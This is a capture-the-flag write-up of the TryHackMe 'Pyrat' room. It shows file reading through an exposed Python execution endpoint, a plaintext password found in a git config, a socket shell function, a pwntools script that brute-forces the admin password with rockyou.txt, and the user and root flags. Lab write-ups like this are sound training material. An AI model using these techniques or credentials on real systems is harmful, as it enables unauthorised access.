~/ Home Projects Tools Link
Writeups
hackthebox/
  • 2million
  • Facts
  • Checkpoint
  • Enigma
  • Nimbus
  • Reactor
  • tryhackme/
  • Wonderland
  • Highschool
  • Ignite
  • JokerCTF
  • Lazy Admin
  • Lightroom
  • Lookup
  • Love Connect
  • Love note
  • Pyrat
  • Startup
  • Tryheartme
  • Valenfind
  • Valley
  • When hearts collide
  • Writeups

    THM Pyrat


    Reconnaissance:

    NMAP 2 ports: SSH 22 && HTTP8000 HTTP doesnt respond well to browser Netcat connection runs pythons scripts ## traversing:

    print(os.listdir('/'))
    print(open('/<file>', 'r').read())

    email @ /var/mail/

    think = jose Dbile Admen = root ___

    GITHUB

    Found /opt/dev/.git and file with

    ../logs/HEAD
    0000000000000000000000000000000000000000 0a3c36d66369fd4b07ddca72e5379461a63470bf Jose Mario <josemlwdf@github.com> 1687339934 +0000    commit (initial): Added shell endpoint
    [core]
            repositoryformatversion = 0
            filemode = true
            bare = false
            logallrefupdates = true
    [user]
            name = Jose Mario
            email = josemlwdf@github.com
    
    [credential]
            helper = cache --timeout=3600
    
    [credential "https://github.com"]
            username = think
            password = _TH1NKINGPirate$_

    SSH with creds

    Open the user flag

    996bdb1f619a68361417cabca5454705 #### git was mentionned so we could restore pyrat.py.old #### RAT was mentionned in THM infos git status #### git restore pyrat.py.old

    def switch_case(client_socket, data):                                                                               
        if data == 'some_endpoint':                                                                                     
            get_this_enpoint(client_socket)                                                                             
        else:                                                                                                           
            # Check socket is admin and downgrade if is not aprooved                                                    
            uid = os.getuid()                                                                                           
            if (uid == 0):                                                                                              
                change_uid()                                                                                            
    
            if data == 'shell':
                shell(client_socket)
            else:
                exec_python(client_socket, data)
    
    def shell(client_socket):
        try:
            import pty
            os.dup2(client_socket.fileno(), 0)
            os.dup2(client_socket.fileno(), 1)
            os.dup2(client_socket.fileno(), 2)
            pty.spawn("/bin/sh")
        except Exception as e:
            send_data(client_socket, e

    We can connect to and end point here and if we call shell we get to /bin/sh

    We start nc on pyrat.thm 8000

    Typing shell then id returns www-data we aren’t root. Typing admin returns a password prompt. #### We use this python script from pwn import *

    Set the host and port

    host = “pyrat.thm” port = 8000

    File path for rockyou.txt password list

    password_file = “/usr/share/wordlists/rockyou.txt”

    Connect to the target

    def connect_to_service(): return remote(host, port)

    Function to attempt login with a password

    def attempt_password(password):
        # Connect to the service
        conn = connect_to_service()
        
        # Send 'admin' as the username
        conn.sendline(b"admin")
        
        # Wait for the password prompt
        conn.recvuntil(b"Password:")
        
        # Send the password from the list
        conn.sendline(password.encode())
    
        # Receive the response and check if we're prompted for a password again
        response = conn.recvline(timeout=2)
        response = conn.recvline(timeout=2)
        # Check if we're asked for the password again (indicates incorrect password)
        if b"Password:" in response:
            print(f"Password '{password}' failed.")
            conn.close()
            return False
        elif b"Welcome" in response or b"Success" in response:  # Adjust this based on the actual success message
            print(f"Password '{password}' might be correct!")
            conn.close()
            return True
        else:
            # Some other response that might indicate progress (adjust based on your observations)
            print(f"Unexpected response for password '{password}'. Response: {response}")
            conn.close()
            return False
    
    # Main function to loop through password list
    def fuzz_passwords():
        with open(password_file, "r", encoding="latin-1") as f:
            for password in f:
                password = password.strip()
                if attempt_password(password):
                    print(f"Found working password: {password}")
                    break
    
    if __name__ == "__main__":
        fuzz_passwords()

    Run the script and it tosses out our password

    abc123


    back to nc pyrat.thm 8000

    admin

    abc123

    cat root.txt

    root flag

    ba5ed03e9e74bb98054438480165e221


    Notes:

    First we take control of the python endpoint by simply inserting and running arbitrary python commands. We find credentials and then return to a previous version thanks to git’s version control. We then run our crafted python script to extract our root password.


    Tools: